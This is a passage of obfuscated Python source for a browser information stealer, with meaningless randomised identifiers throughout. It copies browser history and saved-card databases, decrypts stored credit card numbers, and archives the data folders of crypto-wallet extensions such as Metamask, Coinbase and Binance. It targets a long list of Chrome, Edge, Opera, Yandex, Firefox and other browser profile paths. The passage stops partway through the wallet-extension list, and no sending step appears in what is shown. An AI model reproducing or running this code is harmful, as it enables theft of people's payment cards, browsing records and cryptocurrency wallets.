            KWRLTWDAHSKQMAGUETLHVNZDXNSNQCDGNUKMCAEMACCMSATGCFURRGPAXPZMANKLRXWNKQTXVCFCHQJHAXANCWEDKTNOS =        f"  Title   : {v4r_row[1]}"
            GMRTMGICKLQTCMUOSLFEGPMNVJNIELWLJRVRQIQFCSMHJPBQXYYREFUXWDVQMWYMVESJXOMNCQDJAROKULAMXLXOXVXF =         f"  Time    : {v4r_row[2]}"
            WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name = f"  Browser : {WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS}"
            QDSUNTGMSJUFCUPQELVYNXGTBTBKLUKWEVECCAOZQKEGGUTYOVXAVMQSVSDMEFIBWAZKAVALVYAVWWAHNZHFUYUMRDQJY.append(f"{UDYWJKWXXRHOYYHUSNYJRHHLIVKRFXDWLYLRAKIFFXOUFZBSRBNAJPVFFCDPWWZMMBZWNNFUIOJUHPAZNZTT}\n{KWRLTWDAHSKQMAGUETLHVNZDXNSNQCDGNUKMCAEMACCMSATGCFURRGPAXPZMANKLRXWNKQTXVCFCHQJHAXANCWEDKTNOS}\n{GMRTMGICKLQTCMUOSLFEGPMNVJNIELWLJRVRQIQFCSMHJPBQXYYREFUXWDVQMWYMVESJXOMNCQDJAROKULAMXLXOXVXF}\n{WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name}\n")
            EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO += 1

        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.close()
    
    def YPICNIQZOYIYCLNKZNBIJXVBDBGKJHQMLXLYYLYLNMMHYZSLIVCSMKLKIPTTZLZDBUGNBXAKTLHCBCZLCTEAVPMZCDCFRK(WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK):
        global ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU
        DKWINZDWAWLIZAGFZYORIPRAYPRCDYRUNNBFVCRXPMRPYTPEZJTXOUYDYTBST = os.path.join(LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, 'History')
        if not os.path.exists(DKWINZDWAWLIZAGFZYORIPRAYPRCDYRUNNBFVCRXPMRPYTPEZJTXOUYDYTBST):
            return

        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ = sqlite3.connect(":memory:")
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA = sqlite3.connect(DKWINZDWAWLIZAGFZYORIPRAYPRCDYRUNNBFVCRXPMRPYTPEZJTXOUYDYTBST)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.backup(WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.close()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU = WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.cursor()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.execute('SELECT tab_url, target_path FROM downloads')
        for row in LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.fetchall():
            if not row[0] or not row[1]:
                continue
            MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ =         f"- Path    : {row[1]}"
            UDYWJKWXXRHOYYHUSNYJRHHLIVKRFXDWLYLRAKIFFXOUFZBSRBNAJPVFFCDPWWZMMBZWNNFUIOJUHPAZNZTT =          f"  Url     : {row[0]}"
            WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name = f"  Browser : {WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS}"
            CZEQDCTJKCOFEGAMNTQFCELVKWTJZJULAECGXXIKOAUKOPJBXGEQEDTWIVXHUMRLPURTLPRWLEZWLBNPL.append(f"{MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ}\n{UDYWJKWXXRHOYYHUSNYJRHHLIVKRFXDWLYLRAKIFFXOUFZBSRBNAJPVFFCDPWWZMMBZWNNFUIOJUHPAZNZTT}\n{WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name}\n")
            ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU += 1

        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.close()
    
    def FMIKHJIDROGSUMVVLJHCHHTIFWJMXJJTUYSQDMZNMDEYVLKUIUTEOBKLGPFUPVPHKVLDATTPNQEPIXFMBETGVZDKSELCPKERL(WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS):
        global UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY
        VTBLQUJNWRQCPIEZEZPFIVLONIFMRPOSMEZYDOGQIJVYCOLIHTWFMMCYLXXYXLNHHLJYZZPTHFFGW = os.path.join(LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, 'Web Data')
        if not os.path.exists(VTBLQUJNWRQCPIEZEZPFIVLONIFMRPOSMEZYDOGQIJVYCOLIHTWFMMCYLXXYXLNHHLJYZZPTHFFGW):
            return

        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ = sqlite3.connect(":memory:")
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA = sqlite3.connect(VTBLQUJNWRQCPIEZEZPFIVLONIFMRPOSMEZYDOGQIJVYCOLIHTWFMMCYLXXYXLNHHLJYZZPTHFFGW)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.backup(WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.close()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU = WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.cursor()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.execute('SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards')

        for v4r_row in LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2] or not v4r_row[3]:
                continue
            PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV =             f"- Name             : {v4r_row[0]}"
            VALMZDEJWBXIASBNSPMARURGNXUMIHCMHUXORUJSXBJQGIKMDWUQRXWSMYUIBEVGVIWL = f"  Expiration Month : {v4r_row[1]}"
            IKVDRUAANUXGSUPSABSBSEHXBWQCTMFXBSBEQHHGMGDSBKVXZVJZEXRVHXCYWJELPRNEMEBEYHHZDQLHZVC =  f"  Expiration Year  : {v4r_row[2]}"
            AULQAOZNHSUGHSRPQHTPJTGTJQOZFIGSNUOCNGDSISSTVZTWJQFDNPGCDESGIBNYOWBIEQWHPOJXJFCBEKSDOTVTVODO =      f"  Card Number      : {JCDUFZZNJAPEWDIKDTOKTXBJPVJJCAHPKXBBRHDLQOREKWKNZTSUGAAUIJKMKKTOELTOWQYOTNFDARIYWLARCAUYWOPRRLVMEMWO(v4r_row[3], BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS)}"
            XXIHGHCZCEJOPBOEMYXZWJDTSMECKCYEWSEHTPJUWLLJTXXGKGXGVAIHLFSSEIJAC =    f"  Date Modified    : {v4r_row[4]}"
            WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name =     f"  Browser          : {WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS}"
            PEDGQYITHYUFZNGMWCUMSAWKQKAGMSSUHAUUWHNEVCSURMDVYLVA.append(f"{PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV}\n{VALMZDEJWBXIASBNSPMARURGNXUMIHCMHUXORUJSXBJQGIKMDWUQRXWSMYUIBEVGVIWL}\n{IKVDRUAANUXGSUPSABSBSEHXBWQCTMFXBSBEQHHGMGDSBKVXZVJZEXRVHXCYWJELPRNEMEBEYHHZDQLHZVC}\n{AULQAOZNHSUGHSRPQHTPJTGTJQOZFIGSNUOCNGDSISSTVZTWJQFDNPGCDESGIBNYOWBIEQWHPOJXJFCBEKSDOTVTVODO}\n{XXIHGHCZCEJOPBOEMYXZWJDTSMECKCYEWSEHTPJUWLLJTXXGKGXGVAIHLFSSEIJAC}\n{WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name}\n")
            UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY += 1
        
        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.close()

    def WCQRSYMSVDQPUWEHCUBQEQKPZGXFNQRTXHSQZVGZQYICXUSASAHANEGBOCBAYYEUQIHHUCQG(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK, MUKWBZXRUWJJQWBIPMKCQEQPLVZWDVNQMGLJSNJCSHROGDMQJXTWTNNWB, WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK):
        global SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ
        GCEKTTTSRLCXWOAZOZYFUXJVHBMHEQEVQTIXCCUBJRJMIMPXFBFTIHODGLWESA = os.path.join(LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, 'Extensions')
        HDKFFQQUSAIBZWPVXMFJQDEMKKCKRLQENTXWGTOBPOYVTXAMIUNURIQLLTJSPTEPCJUWBFXYTSIGSLZPZHWRAD = os.path.join("Extensions", WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS)

        if not os.path.exists(GCEKTTTSRLCXWOAZOZYFUXJVHBMHEQEVQTIXCCUBJRJMIMPXFBFTIHODGLWESA):
            return 

        XHJLBCHGFHCVOLDVOTKBOUYCQHRFRWIWIZWQKHWXXPLBEVMFJPKRWRMAWAQONBLBOPGOGXM = [v4r_item for v4r_item in os.listdir(GCEKTTTSRLCXWOAZOZYFUXJVHBMHEQEVQTIXCCUBJRJMIMPXFBFTIHODGLWESA) if os.path.isdir(os.path.join(GCEKTTTSRLCXWOAZOZYFUXJVHBMHEQEVQTIXCCUBJRJMIMPXFBFTIHODGLWESA, v4r_item))]
        
        for v4r_extention in XHJLBCHGFHCVOLDVOTKBOUYCQHRFRWIWIZWQKHWXXPLBEVMFJPKRWRMAWAQONBLBOPGOGXM:
            if "Temp" in v4r_extention:
                continue
            
            SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ += 1
            JUECPRSXDCGKGTPAKNOMVIHDPBGURDFZDFJIRWYEYSOFVZXEOFZNUPDBYARMBFFZHRUVQPGKXEWL = False
            
            for v4r_extension_name, v4r_extension_folder in MUKWBZXRUWJJQWBIPMKCQEQPLVZWDVNQMGLJSNJCSHROGDMQJXTWTNNWB:
                if v4r_extention == v4r_extension_folder:
                    JUECPRSXDCGKGTPAKNOMVIHDPBGURDFZDFJIRWYEYSOFVZXEOFZNUPDBYARMBFFZHRUVQPGKXEWL = True
                    
                    STCHYXCIGKWBCAEFPWCIQVYOYYPHNOYMEMLHQRTQGNLJSEUHUYDUUFHUHRAUPKGEHYGJRNUKNCFTEHQCLAXKGREQMWRX = os.path.join(HDKFFQQUSAIBZWPVXMFJQDEMKKCKRLQENTXWGTOBPOYVTXAMIUNURIQLLTJSPTEPCJUWBFXYTSIGSLZPZHWRAD, v4r_extension_name, v4r_extention)
                    
                    XPXGXGTFMROQMRSMPZOKCFWBJUVUGWVWDFBYWCZDCPLAKLBPUTFKWVGQSCRPCDIRRT = os.path.join(GCEKTTTSRLCXWOAZOZYFUXJVHBMHEQEVQTIXCCUBJRJMIMPXFBFTIHODGLWESA, v4r_extention)
                    for v4r_item in os.listdir(XPXGXGTFMROQMRSMPZOKCFWBJUVUGWVWDFBYWCZDCPLAKLBPUTFKWVGQSCRPCDIRRT):
                        VSIWFXMMEXCHEGGBEPUTFKTZIPCCYIWXUTEOZMRMPXDCBXEZPCSXFLLLIISIWJS = os.path.join(XPXGXGTFMROQMRSMPZOKCFWBJUVUGWVWDFBYWCZDCPLAKLBPUTFKWVGQSCRPCDIRRT, v4r_item)
                        
                        if os.path.isdir(VSIWFXMMEXCHEGGBEPUTFKTZIPCCYIWXUTEOZMRMPXDCBXEZPCSXFLLLIISIWJS):
                            for dirpath, dirnames, filenames in os.walk(VSIWFXMMEXCHEGGBEPUTFKTZIPCCYIWXUTEOZMRMPXDCBXEZPCSXFLLLIISIWJS):
                                for filename in filenames:
                                    file_path = os.path.join(dirpath, filename)
                                    arcname = os.path.relpath(file_path, XPXGXGTFMROQMRSMPZOKCFWBJUVUGWVWDFBYWCZDCPLAKLBPUTFKWVGQSCRPCDIRRT)
                                    ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.write(file_path, os.path.join(STCHYXCIGKWBCAEFPWCIQVYOYYPHNOYMEMLHQRTQGNLJSEUHUYDUUFHUHRAUPKGEHYGJRNUKNCFTEHQCLAXKGREQMWRX, arcname))
                        else:
                            ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.write(VSIWFXMMEXCHEGGBEPUTFKTZIPCCYIWXUTEOZMRMPXDCBXEZPCSXFLLLIISIWJS, os.path.join(STCHYXCIGKWBCAEFPWCIQVYOYYPHNOYMEMLHQRTQGNLJSEUHUYDUUFHUHRAUPKGEHYGJRNUKNCFTEHQCLAXKGREQMWRX, v4r_item))
                    break

            if not JUECPRSXDCGKGTPAKNOMVIHDPBGURDFZDFJIRWYEYSOFVZXEOFZNUPDBYARMBFFZHRUVQPGKXEWL:
                KTBKDZQPIWKGMQNZWIKHTHQCTQBFFPOOCDONZXUZDJJXIITTVSHUCZHHKA = os.path.join(HDKFFQQUSAIBZWPVXMFJQDEMKKCKRLQENTXWGTOBPOYVTXAMIUNURIQLLTJSPTEPCJUWBFXYTSIGSLZPZHWRAD, "Unknown Extension", v4r_extention)
                
                XPXGXGTFMROQMRSMPZOKCFWBJUVUGWVWDFBYWCZDCPLAKLBPUTFKWVGQSCRPCDIRRT = os.path.join(GCEKTTTSRLCXWOAZOZYFUXJVHBMHEQEVQTIXCCUBJRJMIMPXFBFTIHODGLWESA, v4r_extention)
                for v4r_item in os.listdir(XPXGXGTFMROQMRSMPZOKCFWBJUVUGWVWDFBYWCZDCPLAKLBPUTFKWVGQSCRPCDIRRT):
                    VSIWFXMMEXCHEGGBEPUTFKTZIPCCYIWXUTEOZMRMPXDCBXEZPCSXFLLLIISIWJS = os.path.join(XPXGXGTFMROQMRSMPZOKCFWBJUVUGWVWDFBYWCZDCPLAKLBPUTFKWVGQSCRPCDIRRT, v4r_item)
                    
                    if os.path.isdir(VSIWFXMMEXCHEGGBEPUTFKTZIPCCYIWXUTEOZMRMPXDCBXEZPCSXFLLLIISIWJS):
                        for dirpath, dirnames, filenames in os.walk(VSIWFXMMEXCHEGGBEPUTFKTZIPCCYIWXUTEOZMRMPXDCBXEZPCSXFLLLIISIWJS):
                            for filename in filenames:
                                file_path = os.path.join(dirpath, filename)
                                arcname = os.path.relpath(file_path, XPXGXGTFMROQMRSMPZOKCFWBJUVUGWVWDFBYWCZDCPLAKLBPUTFKWVGQSCRPCDIRRT)
                                ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.write(file_path, os.path.join(KTBKDZQPIWKGMQNZWIKHTHQCTQBFFPOOCDONZXUZDJJXIITTVSHUCZHHKA, arcname))
                    else:
                        ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK.write(VSIWFXMMEXCHEGGBEPUTFKTZIPCCYIWXUTEOZMRMPXDCBXEZPCSXFLLLIISIWJS, os.path.join(KTBKDZQPIWKGMQNZWIKHTHQCTQBFFPOOCDONZXUZDJJXIITTVSHUCZHHKA, v4r_item))

    WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_files = [
        ("Google Chrome",          os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Google", "Chrome", "User Data"),                 "chrome.exe"),
        ("Google Chrome SxS",      os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Google", "Chrome SxS", "User Data"),             "chrome.exe"),
        ("Google Chrome Beta",     os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Google", "Chrome Beta", "User Data"),            "chrome.exe"),
        ("Google Chrome Dev",      os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Google", "Chrome Dev", "User Data"),             "chrome.exe"),
        ("Google Chrome Unstable", os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Google", "Chrome Unstable", "User Data"),        "chrome.exe"),
        ("Google Chrome Canary",   os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Google", "Chrome Canary", "User Data"),          "chrome.exe"),
        ("Microsoft Edge",         os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Microsoft", "Edge", "User Data"),                "msedge.exe"),
        ("Opera",                  os.path.join(LSWNQUTNXGAQDDKMYVCEQQYXPIIGHRALUVBWGGHLNOSXXPHVZJHYOOHHV, "Opera Software", "Opera Stable"),                "opera.exe"),
        ("Opera GX",               os.path.join(LSWNQUTNXGAQDDKMYVCEQQYXPIIGHRALUVBWGGHLNOSXXPHVZJHYOOHHV, "Opera Software", "Opera GX Stable"),             "opera.exe"),
        ("Opera Neon",             os.path.join(LSWNQUTNXGAQDDKMYVCEQQYXPIIGHRALUVBWGGHLNOSXXPHVZJHYOOHHV, "Opera Software", "Opera Neon"),                  "opera.exe"),
        ("Brave",                  os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "BraveSoftware", "Brave-Browser", "User Data"),   "brave.exe"),
        ("Vivaldi",                os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Vivaldi", "User Data"),                          "vivaldi.exe"),
        ("Internet Explorer",      os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Microsoft", "Internet Explorer"),                "iexplore.exe"),
        ("Amigo",                  os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Amigo", "User Data"),                            "amigo.exe"),
        ("Torch",                  os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Torch", "User Data"),                            "torch.exe"),
        ("Kometa",                 os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Kometa", "User Data"),                           "kometa.exe"),
        ("Orbitum",                os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Orbitum", "User Data"),                          "orbitum.exe"),
        ("Cent Browser",           os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "CentBrowser", "User Data"),                      "centbrowser.exe"),
        ("7Star",                  os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "7Star", "7Star", "User Data"),                   "7star.exe"),
        ("Sputnik",                os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Sputnik", "Sputnik", "User Data"),               "sputnik.exe"),
        ("Epic Privacy Browser",   os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Epic Privacy Browser", "User Data"),             "epic.exe"),
        ("Uran",                   os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "uCozMedia", "Uran", "User Data"),                "uran.exe"),
        ("Yandex",                 os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Yandex", "YandexBrowser", "User Data"),          "yandex.exe"),
        ("Yandex Canary",          os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Yandex", "YandexBrowserCanary", "User Data"),    "yandex.exe"),
        ("Yandex Developer",       os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Yandex", "YandexBrowserDeveloper", "User Data"), "yandex.exe"),
        ("Yandex Beta",            os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Yandex", "YandexBrowserBeta", "User Data"),      "yandex.exe"),
        ("Yandex Tech",            os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Yandex", "YandexBrowserTech", "User Data"),      "yandex.exe"),
        ("Yandex SxS",             os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Yandex", "YandexBrowserSxS", "User Data"),       "yandex.exe"),
        ("Iridium",                os.path.join(TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH,   "Iridium", "User Data"),                          "iridium.exe"),
        ("Mozilla Firefox",        os.path.join(LSWNQUTNXGAQDDKMYVCEQQYXPIIGHRALUVBWGGHLNOSXXPHVZJHYOOHHV, "Mozilla", "Firefox", "Profiles"),                "firefox.exe"),
        ("Safari",                 os.path.join(LSWNQUTNXGAQDDKMYVCEQQYXPIIGHRALUVBWGGHLNOSXXPHVZJHYOOHHV, "Apple Computer", "Safari"),                      "safari.exe"),
    ]

    HXBQSVVYAZESVXWDYBDIGJQWKFAREFNZYTJGSKOERFUHUAWUTYRP = [
        '', 'Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'
    ]

    MUKWBZXRUWJJQWBIPMKCQEQPLVZWDVNQMGLJSNJCSHROGDMQJXTWTNNWB = [
        ("Metamask",        "nkbihfbeogaeaoehlefnkodbefgpgknn"),
        ("Metamask",        "ejbalbakoplchlghecdalmeeeajnimhm"),
        ("Binance",         "fhbohimaelbohpjbbldcngcnapndodjp"),
        ("Coinbase",        "hnfanknocfeofbddgcijnmhnfnkdnaad"),
        ("Ronin",           "fnjhmkhhmkbjkkabndcnnogagogbneec"),
        ("Trust",           "egjidjbpglichdcondbcbdnbeeppgdph"),
        ("Venom",           "ojggmchlghnjlapmfbnjholfjkiidbch"),
